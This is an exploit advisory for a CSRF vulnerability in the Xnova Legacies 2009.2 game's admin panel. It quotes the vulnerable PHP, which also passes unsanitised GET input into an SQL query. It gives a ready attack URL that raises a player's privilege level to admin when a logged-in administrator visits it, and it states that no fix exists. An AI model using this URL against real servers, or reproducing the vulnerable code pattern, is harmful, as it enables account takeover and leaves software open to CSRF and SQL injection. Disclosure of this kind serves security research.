Xnova Legacies 2009.2 CSRF Vulnerability

2011-01-26 09:15:09

# Exploit Title: Xnova Legacies 2009.2 CSRF
# Date: 27/1/2011
# Author: @xploitaday
# Software Homepage: http://www.xnova-ng.org/
# Software Link: http://downloads.tuxfamily.org/xnlegacies/releases/xnova-legacies_2009.2.tar.gz
# Version: 2009.2

Vuln file: admin/paneladmina.php
Vuln Lines:
case 'usr_level':
$Player = $_GET['player'];
$NewLvl = $_GET['authlvl'];

$QryUpdate = doquery("UPDATE {{table}} SET `authlevel` = '".$NewLvl."' WHERE `username` = '".$Player."';", 'users');
$Message = $lang['adm_mess_lvl1']. " ". $Player ." ".$lang['adm_mess_lvl2'];
$Message .= "<font color=\"red\">".$lang['adm_usr_level'][ $NewLvl ]."</font>!";

AdminMessage ( $Message, $lang['adm_mod_level'] );

If you are a moderator, you can set you admin.
And if an admin visit this link, you be will granted with admin privileges (control of game)

Replace SERVER and PLAYER with yours

Attack url: http://SERVER/admin/paneladmina.php?result=usr_level&player=PLAYER&authlvl=3


No fixes

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